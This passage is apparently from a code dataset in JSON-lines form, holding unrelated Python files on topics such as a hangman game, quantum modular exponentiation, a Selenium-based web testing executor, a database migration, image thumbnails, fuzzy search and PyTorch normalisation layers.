5\n\nResult = Tuple[bool, str]\n\n# word constants\n\nWORD_LENGTH = 'word_length'\n\n\n# graphql constants\n\nField = str\nMessage = str or bool\n\nclass ResponseField(Enum):\n '''\n This class contains the response field names\n '''\n \n data : Field = 'data'\n errors : Field = 'errors'\n success : Field = 'success'\n state : Field = 'state'\n time : Field = 'time'\n method : Field = 'method'\n input : Field = 'input'\n name : Field = 'name'\n wins : Field = 'wins'\n losses : Field = 'losses'\n missed : Field = 'missed'\n message : Field = 'message'\n word : Field = 'word'\n guessedWord: Field = 'guessedWord'\n\nResponse = Dict[ResponseField, Any]\n\n\nclass MenuItems(Enum):\n '''\n This class contains the menu item names\n '''\n\n PLAY_GAME = 'play'\n QUIT_GAME = 'quit'\n NEW_PLAYER = 'new'\n\n\nclass GameStates(Enum):\n '''\n This class contains the different \n '''\n\n PLAYING = 'playing'\n WIN = 'win'\n LOSE = 'lose'","repo_name":"jehalladay/AdvPy-jehalladay","sub_path":"project1/hangman/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15133337927","text":"from projectq.backends import CircuitDrawer\nimport projectq.libs.math\nimport projectq.setups.decompositions\nfrom projectq.backends import Simulator, ResourceCounter\nfrom projectq.cengines import (AutoReplacer, DecompositionRuleSet,\n InstructionFilter, LocalOptimizer,\n MainEngine, TagRemover)\n\nfrom projectq.ops import (All, Measure)\nfrom homemade_code.initialisation import meas2int, initialisation_n\nimport math\nfrom Projet_Partie2.expoModN import expoModN\n\ndef run(a=4, N=7, x=2, param=\"run\"):\n \"\"\"\n\n :param a: a --> |(a**x) mod N>\n \"\"\"\n # build compilation engine list\n resource_counter = ResourceCounter()\n rule_set = DecompositionRuleSet(modules=[projectq.libs.math,\n projectq.setups.decompositions])\n compilerengines = [AutoReplacer(rule_set),\n TagRemover(),\n LocalOptimizer(3),\n AutoReplacer(rule_set),\n TagRemover(),\n LocalOptimizer(3),\n resource_counter]\n\n # create a main compiler engine\n a = a % N\n b = 0\n n = int(math.log(N, 2)) + 1\n\n if param == \"latex\":\n drawing_engine = CircuitDrawer()\n eng = MainEngine(drawing_engine)\n if param == \"count\":\n eng = MainEngine(resource_counter)\n else:\n eng = MainEngine(Simulator(), compilerengines)\n\n output = initialisation_n(eng, 1, n + 1)\n xN = initialisation_n(eng, N, n + 1)\n xx = initialisation_n(eng, x, n + 1)\n xb = initialisation_n(eng, b, n + 1)\n aux = initialisation_n(eng, 0, 1)\n expoModN(eng, a, output, xb, xN, aux, xx, N)\n\n Measure | aux\n All(Measure) | output\n All(Measure) | xx\n All(Measure) | xb\n All(Measure) | xN\n eng.flush()\n\n if param == \"count\":\n return resource_counter\n if param == \"latex\":\n print(drawing_engine.get_latex())\n\n measurements_b = [0] * n\n measurements_x = [0] * n\n measurements_N = [0] * n\n for k in range(n):\n measurements_b[k] = int(xb[k])\n measurements_N[k] = int(xN[k])\n measurements_x[k] = int(output[k])\n\n mes_aux = int(aux[0])\n\n assert int(xb[n]) == 0\n assert int(xN[n]) == 0\n assert int(xx[n]) == 0\n assert meas2int(measurements_b) == 0\n assert meas2int(measurements_N) == N\n assert mes_aux == 0\n\n return [(a ** x) % N, meas2int(measurements_x), measurements_x]\n","repo_name":"miyamotohk/quantum-calculus","sub_path":"Probability distributions/expoModN_test.py","file_name":"expoModN_test.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"14779543572","text":"__author__ = 'Frostlock'\n\nimport unittest\nimport random\nimport pygame\n\nimport WarrensGame.Game as Game\nimport WarrensGame.CONSTANTS as CONSTANTS\nfrom WarrensGame.Actors import Player\nfrom WarrensGame.Levels import Level\nfrom WarrensGUI.MainWindow import MainWindow\n\nDELAY = 10\n\nclass TestGui(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n unittest framework will run this once before all the tests in this class.\n \"\"\"\n CONSTANTS.SHOW_AI_LOGGING = False\n CONSTANTS.SHOW_GAME_LOGGING = True\n CONSTANTS.SHOW_GENERATION_LOGGING = False\n\n self.game = Game.Game()\n #Force quickstart (so we know where the portals are\n CONSTANTS.QUICKSTART = True\n self.game.resetGame()\n self.mainWindow = MainWindow()\n self.mainWindow.game = self.game\n \n @classmethod\n def tearDownClass(self):\n \"\"\"\n unittest framework will run this once after all the tests in this class have been run.\n \"\"\"\n pass\n \n def setUp(self):\n \"\"\"\n unittest framework will run this before every individual test.\n \"\"\"\n pass\n \n def tearDown(self):\n \"\"\"\n unittest framework will run this after every individual test.\n \"\"\"\n pass\n\n @property\n def player(self):\n player = self.mainWindow.game.player\n assert(isinstance(player, Player))\n return player\n\n @property\n def level(self):\n level = self.mainWindow.game.player.level\n assert(isinstance(level, Level))\n return level\n\n def drawFrame(self):\n self.mainWindow.refreshStaticObjects()\n self.mainWindow.refreshDynamicObjects()\n self.mainWindow.drawAll()\n pygame.display.flip()\n # Allow time to see it\n pygame.time.delay(DELAY)\n\n def test_showGUI(self):\n # Draw first frame\n self.drawFrame()\n\n def test_moveAround(self):\n for i in range(0,10):\n dx = random.choice([-1, 0, 1])\n dy = random.choice([-1, 0, 1])\n self.player.tryMoveOrAttack(dx,dy)\n self.drawFrame()\n\n def test_followPortals(self):\n for portal in self.level.portals:\n self.player.moveToTile(portal.tile)\n self.player.followPortal(portal)\n self.drawFrame()\n\n def test_grabItems(self):\n dungeonLevel = self.mainWindow.game.levels[1]\n for item in dungeonLevel.items:\n self.player.moveToTile(item.tile)\n self.player.tryPickUp()\n self.drawFrame()\n","repo_name":"Frostlock/Warrens","sub_path":"WarrensTest/Gui_test.py","file_name":"Gui_test.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3875112265","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n]\n\n\nurlpatterns += [\n path(\"\", include(\"quena.urls\", namespace=\"quena\")),\n path(\"user/\", include(\"user.urls\", namespace=\"user\")),\n]","repo_name":"abhie-lp/Quena","sub_path":"clone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70970572854","text":"import dataclasses\nimport io\nimport subprocess\nimport logging\nimport threading\nimport time\nfrom shutil import which\nfrom dataclasses import dataclass\nimport traceback\nimport png\nfrom typing import List, Union, Literal, Any, cast\nfrom selenium import webdriver\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.options import BaseOptions\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.select import Select\n\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.chrome.service import Service as ChromeService\n\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium.webdriver.firefox.service import Service as FirefoxService\n\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom selenium.webdriver.edge.service import Service as EdgeService\n\nfrom selenium.webdriver.safari.options import Options as SafariOptions\nfrom selenium.webdriver.safari.service import Service as SafariService\n\nfrom quickstrom.protocol import *\nfrom quickstrom.hash import dict_hash\nimport quickstrom.result as result\nimport quickstrom.printer as printer\nimport os\n\nUrl = str\n\n\n@dataclass\nclass SpecstromError(Exception):\n message: str\n exit_code: int\n log_file: str\n\n def __str__(self):\n return f\"{self.message}, exit code {self.exit_code}\"\n\n\n@dataclass\nclass SpecstromAbortedError(Exception):\n message: str\n\n def __str__(self):\n return f\"{self.message}\"\n\n\n@dataclass\nclass PerformActionError(Exception):\n action: Action\n error: Exception\n\n def __str__(self):\n return f\"Error while performing {self.action}:\\n\\n{self.error} {self.error}\"\n\n\n@dataclass\nclass UnsupportedActionError(Exception):\n action: Action\n\n def __str__(self):\n return f\"Unsupported action: {self.action.id}\"\n\n\n@dataclass\nclass ScriptError(Exception):\n name: str\n script_args: List[JsonLike]\n error: Exception\n\n def __str__(self):\n return f\"Error while invoking script {self.name} with args {self.script_args}:\\n{self.error}\"\n\n\n@dataclass\nclass ClientSideEvents:\n events: List[Action]\n state: State\n\n\n@dataclass\nclass Scripts:\n query_state: Callable[[WebDriver, Dict[Selector, Schema]], State]\n install_event_listener: Callable[[WebDriver, Dict[Selector, Schema]], None]\n await_events: Callable[\n [WebDriver, Dict[Selector, Schema], int], Optional[ClientSideEvents]\n ]\n\n\nBrowser = Union[\n Literal[\"chrome\"],\n Literal[\"firefox\"],\n Literal[\"edge\"],\n Literal[\"safari\"],\n]\n\n\n@dataclass\nclass Cookie:\n domain: str\n name: str\n value: str\n\n\n@dataclass\nclass Check:\n module: str\n origin: str\n browser: Browser\n browser_binary: Optional[str]\n include_paths: List[str]\n headless: bool\n capture_screenshots: bool\n cookies: List[Cookie]\n driver_log_file: Optional[str]\n extra_desired_capabilities: Optional[Dict[str, Any]]\n remote_webdriver_url: Optional[str]\n interpreter_log_file: IO\n log: logging.Logger = logging.getLogger(\"quickstrom.executor\")\n\n def execute(self) -> List[result.PlainResult]:\n scripts = self.load_scripts()\n\n with self.launch_specstrom(self.interpreter_log_file) as p:\n assert p.stdout is not None\n assert p.stdin is not None\n input_messages = message_reader(p.stdout)\n output_messages = message_writer(p.stdin)\n screenshots: Dict[str, result.Screenshot[bytes]] = {}\n\n def receive():\n msg = input_messages.read()\n exit_code = p.poll()\n if msg is None and exit_code is not None:\n if exit_code == 0:\n return None\n else:\n raise SpecstromError(\n \"Specstrom invocation failed\",\n exit_code,\n self.interpreter_log_file.name,\n )\n else:\n self.log.debug(\"Received %s\", msg)\n return msg\n\n def send(msg):\n exit_code = p.poll()\n if exit_code is None:\n self.log.debug(\"Sending %s\", msg)\n output_messages.write(msg)\n elif exit_code == 0:\n self.log.warning(\"Done, can't send.\")\n else:\n self.log.warning(\"Specstrom errored, can't send.\")\n\n def perform_action(driver, action):\n try:\n if action.id == \"noop\":\n pass\n elif action.id == \"click\":\n id = action.args[0]\n element = WebElement(driver, id)\n try:\n element.click()\n except Exception as e:\n self.log.warning(\n \"Basic click failed, falling back to JS click: %s\", e\n )\n driver.execute_script(\"arguments[0].click();\", element)\n elif action.id == \"doubleClick\":\n id = action.args[0]\n element = WebElement(driver, id)\n ActionChains(driver).move_to_element(element).double_click(\n element\n ).perform()\n elif action.id == \"select\":\n id = action.args[0]\n value = action.args[1]\n option = WebElement(driver, id)\n select = Select(\n option.find_element(By.XPATH, \"./ancestor::select\")\n )\n select.select_by_value(value)\n elif action.id == \"focus\":\n id = action.args[0]\n element = WebElement(driver, id)\n element.send_keys(\"\")\n elif action.id == \"keyPress\":\n char = action.args[0]\n element = driver.switch_to.active_element\n element.send_keys(char)\n elif action.id == \"enterText\":\n element = driver.switch_to.active_element\n element.send_keys(action.args[0])\n elif action.id == \"enterTextInto\":\n id = action.args[1]\n element = WebElement(driver, id)\n element.send_keys(action.args[0])\n elif action.id == \"clear\":\n id = action.args[0]\n element = WebElement(driver, id)\n element.clear()\n elif action.id == \"scrollBy\":\n driver.execute_script(\n \"window.scrollBy(arguments[0], arguments[1])\",\n action.args[0],\n action.args[1],\n )\n else:\n raise UnsupportedActionError(action)\n except Exception as e:\n raise PerformActionError(action, e)\n\n def screenshot(driver: WebDriver, hash: str):\n if self.capture_screenshots:\n bs: bytes = driver.get_screenshot_as_png() # type: ignore\n (width, height, _, _) = png.Reader(io.BytesIO(bs)).read()\n window_size = driver.get_window_size()\n scale = round(width / window_size[\"width\"])\n if scale != round(height / window_size[\"height\"]):\n self.log.warn(\n \"Width and height scales do not match for screenshot\"\n )\n screenshots[hash] = result.Screenshot(\n image=bs, width=width, height=height, scale=scale\n )\n\n def attach_screenshots(r: result.PlainResult) -> result.PlainResult:\n def on_state(state):\n return result.State(\n screenshot=screenshots.get(state.hash, None),\n queries=state.queries,\n hash=state.hash,\n )\n\n return result.map_states(r, on_state)\n\n def await_events(driver, deps, state_version, timeout: int):\n def on_no_events():\n state = scripts.query_state(driver, deps)\n screenshot(driver, dict_hash(state))\n state_version.increment()\n send(Timeout(state=state))\n\n try:\n self.log.debug(f\"Awaiting events with timeout {timeout}\")\n events = scripts.await_events(driver, deps, timeout)\n self.log.debug(f\"Change: {events}\")\n\n if events is None:\n self.log.info(f\"Timed out!\")\n on_no_events()\n else:\n screenshot(driver, dict_hash(events.state))\n state_version.increment()\n send(Events(events.events, events.state))\n except StaleElementReferenceException as e:\n self.log.error(f\"Stale element reference: {e}\")\n on_no_events()\n\n def run_sessions() -> List[result.PlainResult]:\n while True:\n msg = receive()\n assert msg is not None\n if isinstance(msg, Start):\n try:\n self.log.info(\"Starting session\")\n driver = self.new_driver()\n driver.set_script_timeout(10)\n driver.set_window_size(1200, 1200)\n\n if len(self.cookies) > 0:\n # First we need to visit the page in order to set cookies.\n driver.get(self.origin)\n for cookie in self.cookies:\n self.log.debug(f\"Setting {cookie}\")\n driver.add_cookie(dataclasses.asdict(cookie))\n # Now that cookies are set, we have to visit the origin again.\n driver.get(self.origin)\n # Hacky sleep to allow page load.\n time.sleep(1)\n\n state_version = Counter(initial_value=0)\n\n scripts.install_event_listener(driver, msg.dependencies)\n await_events(driver, msg.dependencies, state_version, 10000)\n\n await_session_commands(\n driver, msg.dependencies, state_version\n )\n except SpecstromAbortedError as e:\n raise e\n except Exception as e:\n send(Error(traceback.format_exc()))\n msg = receive()\n if not isinstance(msg, End):\n raise Exception(\n f\"Expected End after Error but got: {msg}\"\n )\n elif isinstance(msg, Done):\n return [\n attach_screenshots(result.from_protocol_result(r))\n for r in msg.results\n ]\n elif isinstance(msg, Aborted):\n raise SpecstromAbortedError(msg.error_message)\n else:\n raise Exception(f\"Unexpected message in run_sessions: {msg}\")\n\n def await_session_commands(driver: WebDriver, deps, state_version):\n try:\n while True:\n msg = receive()\n\n if not msg:\n raise Exception(\n \"No more messages from Specstrom, expected RequestAction or End.\"\n )\n elif isinstance(msg, RequestAction):\n if msg.version == state_version.value:\n self.log.info(\n f\"Performing action in state {state_version.value}: {printer.pretty_print_action(msg.action)}\"\n )\n\n perform_action(driver, msg.action)\n\n if msg.action.timeout is not None:\n self.log.debug(\"Installing change observer\")\n scripts.install_event_listener(driver, deps)\n\n state = scripts.query_state(driver, deps)\n screenshot(driver, dict_hash(state))\n state_version.increment()\n send(Performed(state=state))\n\n if msg.action.timeout is not None:\n await_events(\n driver, deps, state_version, msg.action.timeout\n )\n else:\n self.log.warn(\n f\"Got stale message ({msg}) in state {state_version.value}\"\n )\n send(Stale())\n elif isinstance(msg, AwaitEvents):\n if msg.version == state_version.value:\n self.log.info(\n f\"Awaiting events in state {state_version.value} with timeout {msg.await_timeout}\"\n )\n scripts.install_event_listener(driver, deps)\n await_events(\n driver, deps, state_version, msg.await_timeout\n )\n else:\n self.log.warn(\n f\"Got stale message ({msg}) in state {state_version.value}\"\n )\n send(Stale())\n elif isinstance(msg, End):\n self.log.info(\"Ending session\")\n return\n elif isinstance(msg, Aborted):\n raise SpecstromAbortedError(msg.error_message)\n else:\n raise Exception(f\"Unexpected message: {msg}\")\n finally:\n driver.close()\n\n return run_sessions()\n\n def launch_specstrom(self, ilog):\n includes = list(map(lambda i: \"-I\" + i, self.include_paths))\n cmd = [\"specstrom\", \"check\", self.module] + includes # + [\"+RTS\", \"-p\"]\n self.log.debug(\"Invoking Specstrom with: %s\", \" \".join(cmd))\n return subprocess.Popen(\n cmd,\n text=True,\n stdout=subprocess.PIPE,\n stderr=ilog,\n stdin=subprocess.PIPE,\n bufsize=0,\n )\n\n def new_driver(self) -> WebDriver:\n if self.remote_webdriver_url is not None:\n return webdriver.Remote(\n command_executor=self.remote_webdriver_url,\n options=self.browser_shared_options(),\n )\n elif self.browser == \"chrome\":\n chrome_opts = cast(ChromeOptions, self.browser_shared_options())\n chromedriver_path = which(\"chromedriver\")\n if not chromedriver_path:\n raise Exception(\"chromedriver not found in PATH\")\n browser_path = (\n self.browser_binary\n or which(\"chromium\")\n or which(\"google-chrome-stable\")\n or which(\"google-chrome\")\n or which(\"chrome\")\n )\n chrome_opts.binary_location = browser_path # type: ignore\n chrome_opts.add_argument(\"--no-sandbox\")\n chrome_opts.add_argument(\"--single-process\")\n return webdriver.Chrome(\n options=chrome_opts,\n service=ChromeService(\n executable_path=chromedriver_path, log_path=self.driver_log_file\n ),\n )\n elif self.browser == \"edge\":\n edge_opts = cast(EdgeOptions, self.browser_shared_options())\n edgedriver_path = which(\"msedgedriver\")\n if not edgedriver_path:\n raise Exception(\"msedgedriver not found in PATH\")\n browser_path = (\n self.browser_binary\n or which(\"microsoft-edge-stable\")\n or which(\"microsoft-edge\")\n )\n edge_opts.binary_location = browser_path # type: ignore\n edge_opts.add_argument(\"--no-sandbox\")\n edge_opts.add_argument(\"--single-process\")\n return webdriver.Edge(\n options=edge_opts,\n service=EdgeService(\n executable_path=edgedriver_path, log_path=self.driver_log_file\n ),\n )\n elif self.browser == \"firefox\":\n firefox_opts = cast(FirefoxOptions, self.browser_shared_options())\n binary = self.browser_binary or which(\"firefox\")\n geckodriver_path = which(\"geckodriver\")\n if not geckodriver_path:\n raise Exception(\"geckodriver not found in PATH\")\n return webdriver.Firefox(\n options=firefox_opts,\n service=FirefoxService(\n executable_path=geckodriver_path,\n log_path=self.driver_log_file or \"geckodriver.log\",\n service_args=[\"--binary\", binary] if binary else [],\n ),\n )\n else:\n raise Exception(f\"Unsupported browser: {self.browser}\")\n\n def browser_shared_options(self) -> Union[ChromeOptions, FirefoxOptions, EdgeOptions, SafariOptions]:\n def set_shared(options):\n for key, value in (self.extra_desired_capabilities or {}).items():\n options.set_capability(key, value)\n options.headless = self.headless\n return options\n\n if self.browser == \"chrome\":\n return set_shared(ChromeOptions())\n elif self.browser == \"firefox\":\n return set_shared(FirefoxOptions())\n elif self.browser == \"edge\":\n return set_shared(EdgeOptions())\n elif self.browser == \"safari\":\n return set_shared(SafariOptions())\n else:\n raise Exception(f\"Unsupported browser: {self.browser}\")\n\n def load_scripts(self) -> Scripts:\n def map_query_state(r):\n if r is None:\n raise Exception(\n \"WebDriver script invocation failed with unexpected None result. This might be caused by an unexpected page navigation in the browser. Consider adding a timeout to the corresponding action.\"\n )\n return elements_to_refs(r)\n\n def map_client_side_events(r):\n def map_event(e: dict):\n if e[\"tag\"] == \"loaded\":\n return Action(id=\"loaded\", args=[], isEvent=True, timeout=None)\n elif e[\"tag\"] == \"changed\":\n return Action(\n id=\"changed\",\n args=[elements_to_refs(e[\"element\"])],\n isEvent=True,\n timeout=None,\n )\n elif e[\"tag\"] == \"detached\":\n return Action(\n id=\"detached\", args=[e[\"markup\"]], isEvent=True, timeout=None\n )\n else:\n raise Exception(f\"Invalid event tag in: {e}\")\n\n return (\n ClientSideEvents(\n [map_event(e) for e in r[\"events\"]], elements_to_refs(r[\"state\"])\n )\n if r is not None\n else None\n )\n\n result_mappers = {\n \"queryState\": map_query_state,\n \"installEventListener\": lambda r: r,\n \"awaitEvents\": map_client_side_events,\n }\n\n def load_script(name: str, is_async: bool = False) -> Any:\n key = \"QUICKSTROM_CLIENT_SIDE_DIRECTORY\"\n client_side_dir = os.getenv(key)\n if not client_side_dir:\n raise Exception(f\"Environment variable {key} must be set\")\n file = open(f\"{client_side_dir}/{name}.js\")\n script = file.read()\n\n def f(driver: WebDriver, *args: Any) -> JsonLike:\n try:\n r = (\n driver.execute_async_script(script, *args)\n if is_async\n else driver.execute_script(script, *args)\n )\n return result_mappers[name](r)\n except StaleElementReferenceException as e:\n raise e\n except Exception as e:\n raise ScriptError(name, list(args), e)\n\n return f\n\n return Scripts(\n query_state=load_script(\"queryState\"),\n install_event_listener=load_script(\"installEventListener\"),\n await_events=load_script(\"awaitEvents\", is_async=True),\n )\n\n\ndef elements_to_refs(obj: Any) -> Any:\n if isinstance(obj, dict):\n return {key: elements_to_refs(value) for (key, value) in obj.items()}\n elif isinstance(obj, list):\n return [elements_to_refs(value) for value in obj]\n elif isinstance(obj, WebElement):\n return obj.id\n else:\n return obj\n\n\nclass Counter(object):\n def __init__(self, initial_value=0):\n self.value = initial_value\n self._lock = threading.Lock()\n\n def increment(self):\n with self._lock:\n self.value += 1\n","repo_name":"quickstrom/quickstrom","sub_path":"quickstrom/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":22568,"program_lang":"python","lang":"en","doc_type":"code","stars":341,"dataset":"github-code","pt":"21"} +{"seq_id":"40127408187","text":"\"\"\"empty message\n\nRevision ID: 00fd95caf146\nRevises: ff6127b7e211\nCreate Date: 2022-01-18 19:14:26.603332\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '00fd95caf146'\ndown_revision = 'ff6127b7e211'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('contributed_asset', 'uuid',\n existing_type=sa.INTEGER(),\n type_=sa.String(),\n existing_nullable=False)\n op.alter_column('track_asset', 'uuid',\n existing_type=sa.INTEGER(),\n type_=sa.String(),\n existing_nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('track_asset', 'uuid',\n existing_type=sa.String(),\n type_=sa.INTEGER(),\n existing_nullable=False)\n op.alter_column('contributed_asset', 'uuid',\n existing_type=sa.String(),\n type_=sa.INTEGER(),\n existing_nullable=False)\n # ### end Alembic commands ###\n","repo_name":"royalsaltmerchant/salt_server","sub_path":"migrations/versions/00fd95caf146_.py","file_name":"00fd95caf146_.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18386795992","text":"from PIL import Image\r\nimport os\r\n\r\n#map_image = Image.open(\"Master_Map.jpg\")\r\n#Image._show(map_image)\r\n#map_image.show()\r\n#map_image.save(\"Master_Map.bmp\")\r\nsize_300 = (300,300)\r\nsize_800 = (800,800)\r\n\r\nfor file in os.listdir('.'):\r\n if file.endswith('.bmp'):\r\n img = Image.open(file)\r\n fn,fext = os.path.splitext(file)\r\n\r\n img.thumbnail(size_800)\r\n img.convert(mode='L').save(\"800\\{}_800.jpg\".format(fn))\r\n #img.save(\"800\\{}_800.jpg\".format(fn))\r\n print(\"{}_800.jpg\".format(fn))\r\n\r\n img.thumbnail(size_300)\r\n img.save(\"300\\{}_300.jpg\".format(fn))\r\n print(\"{}_300.jpg\".format(fn))\r\n\r\n## just is for test from Home server1\r\n## test 2\r\n\r\n\r\n\r\n#print(os.chdir(\".\"))","repo_name":"yousef-niari/watom","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30619490384","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[10]:\n\n\nimport numpy as np\nimport pandas as pd\nimport Levenshtein as lp\nimport math\nimport sys\n\n\n# In[11]:\n\n\ndf = pd.read_excel('mmv.xlsx')\n\n\n# In[12]:\n\n\nr = []\nind = 0\nfor i in df['model_name']:\n j = i.split(' ')\n r.append(j[len(j)-1])\n\n\n# In[13]:\n\n\ndf['r']=r\n\n\n# In[6]:\n\n\n# merging\ndf1 = []\ndf2 = []\nfor j in range(2):\n for i in df['model_name']:\n df2.append(str(i))\nfor i in df['make_name']:\n df1.append(str(i))\nfor i in df['r']:\n df1.append(str(i))\ndf1 = {'make_name' : df1, 'model_name' : df2}\ndf1 = pd.DataFrame(df1)\n\n\n# In[8]:\n\n\ndf2 = {}\nmake = df1['make_name']\nfor i in make:\n make1 = []\n x = str(i)\n for j in range(3,len(x)):\n if(x[j - 1] == ' '):\n continue\n make1.append(x[0:j])\n make1.append(x)\n df2[x] = make1\n# print(x, ':', df2[x])\nmodel1 = []\nmake_sub1 = []\nct = 0\nfor i in range(len(df1['make_name'])):\n make = df1['make_name'].iloc[i]\n model = df1['model_name'].iloc[i]\n for make_sub in df2[make]:\n model1.append(model)\n make_sub1.append(make_sub)\ndf3 = {'make_name' : make_sub1, 'model_name' : model1}\ndf3 = pd.DataFrame(df3)\ndf3=df3.apply(lambda x: x.astype(str).str.lower())\n\n\n# In[ ]:\n\n\n#Taking the input value and comparing edit distance with every value in the dataset\ninp = input()\ned = {}\nfor names in df3['make_name']:\n if names in ed:\n continue\n else:\n ed[names] = lp.distance(str(names), inp)\n\n\n# In[ ]:\n\n\nmi = sys.maxsize\nmi_name = ''\nfor i in ed:\n if ed[i] < mi:\n mi = ed[i]\n mi_name = str(i)\nmi, mi_name\n\n\n# In[ ]:\n\n\nedi = []\nfor make in df3['make_name']:\n edi.append(ed[make])\ndf3['make_ed'] = edi\n\nc = mi\nli = []\nfor k in range(len(df3['model_name'])):\n if df3['make_ed'].iloc[k] == c:\n li.append(df3['model_name'].iloc[k])\n# converting into set to get rid of same values in our dataset\nli = set(li)\n# coverting back into list as further operations can be implemented only on list\nli_list = list(li)\nli_list\n\n\n# In[ ]:\n\n\n# check the first letter match\nfor i in range (len(li)):\n if li_list[i][0] == inp[0]:\n print (li_list[i])\n\n\n# In[ ]:\n\n\n# for i in range(len(li_list)):\n# te = li_list[i].split()\n# for j in range(len(te)):\n# if te[j] == inp:\n# print (li[i])\n# elif te[j][0] == inp[0]:\n# print (li_list[i])\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Himanshu-Him/Search-Bar-Optimization","sub_path":"Search_algo.py","file_name":"Search_algo.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13588048502","text":"import torch\nfrom typing import OrderedDict\nfrom ..activations import activation_factory\nfrom ..layers.regularization import LayerNormChannelsFirst\n\n\ndef get_adn_fn(\n spatial_dim, norm_fn=\"batch\", act_fn=\"swish\", dropout_param=0.1\n):\n norm_fn_dict = {\n \"batch\": {\n 1: torch.nn.BatchNorm1d,\n 2: torch.nn.BatchNorm2d,\n 3: torch.nn.BatchNorm3d,\n },\n \"instance\": {\n 1: torch.nn.InstanceNorm1d,\n 2: torch.nn.InstanceNorm2d,\n 3: torch.nn.InstanceNorm3d,\n },\n \"layer\": {\n 1: torch.nn.LayerNorm,\n 2: LayerNormChannelsFirst,\n 3: LayerNormChannelsFirst,\n },\n \"identity\": {\n 1: torch.nn.Identity,\n 2: torch.nn.Identity,\n 3: torch.nn.Identity,\n },\n }\n if norm_fn not in norm_fn_dict:\n raise \"norm_fn must be one of {}\".format(norm_fn_dict)\n norm_fn = norm_fn_dict[norm_fn][spatial_dim]\n if isinstance(act_fn, str):\n act_fn = activation_factory[act_fn]\n\n return ActDropNormBuilder(\n norm_fn=norm_fn, act_fn=act_fn, dropout_param=dropout_param\n )\n\n\nclass ActDropNorm(torch.nn.Module):\n def __init__(\n self,\n in_channels: int = None,\n ordering: str = \"NDA\",\n norm_fn: torch.nn.Module = torch.nn.BatchNorm2d,\n act_fn: torch.nn.Module = torch.nn.PReLU,\n dropout_fn: torch.nn.Module = torch.nn.Dropout,\n dropout_param: float = 0.0,\n inplace: bool = False,\n ):\n \"\"\"Convenience function to combine activation, dropout and\n normalisation. Similar to ADN in MONAI.\n\n Args:\n in_channels (int, optional): number of input channels. Defaults to\n None.\n ordering (str, optional): ordering of the N(ormalization),\n D(ropout) and A(ctivation) operations. Defaults to 'NDA'.\n norm_fn (torch.nn.Module, optional): torch module used for\n normalization. Defaults to torch.nn.BatchNorm2d.\n act_fn (torch.nn.Module, optional): activation function. Defaults\n to torch.nn.PReLU.\n dropout_fn (torch.nn.Module, optional): Function used for dropout.\n Defaults to torch.nn.Dropout.\n dropout_param (float, optional): parameter for dropout. Defaults\n to 0.\n inplace (bool, optional): inplace parameter for activation\n function. Defaults to True.\n \"\"\"\n super().__init__()\n self.ordering = ordering\n self.norm_fn = norm_fn\n self.in_channels = in_channels\n self.act_fn = act_fn\n self.dropout_fn = dropout_fn\n self.dropout_param = dropout_param\n self.inplace = inplace\n\n self.name_dict = {\n \"A\": \"activation\",\n \"D\": \"dropout\",\n \"N\": \"normalization\",\n }\n self.init_layers()\n\n def init_layers(self):\n \"\"\"Initiates the necessary layers.\"\"\"\n if self.act_fn is None:\n self.act_fn = torch.nn.Identity\n if self.norm_fn is None:\n self.norm_fn = torch.nn.Identity\n if self.dropout_fn is None:\n self.dropout_fn = torch.nn.Identity\n\n op_dict = {\n \"A\": self.get_act_fn,\n \"D\": self.get_dropout_fn,\n \"N\": self.get_norm_fn,\n }\n\n op_list = {}\n for k in self.ordering:\n op_list[self.name_dict[k]] = op_dict[k]()\n op_list = OrderedDict(op_list)\n\n self.op = torch.nn.Sequential(op_list)\n\n def get_act_fn(self):\n try:\n return self.act_fn(inplace=self.inplace)\n except:\n return self.act_fn()\n\n def get_dropout_fn(self):\n return self.dropout_fn(self.dropout_param)\n\n def get_norm_fn(self):\n return self.norm_fn(self.in_channels)\n\n def forward(self, X: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward function.\n\n Args:\n X (torch.Tensor)\n\n Returns:\n torch.Tensor\n \"\"\"\n return self.op(X)\n\n\nclass ActDropNormBuilder:\n def __init__(\n self,\n ordering: str = \"NDA\",\n norm_fn: torch.nn.Module = 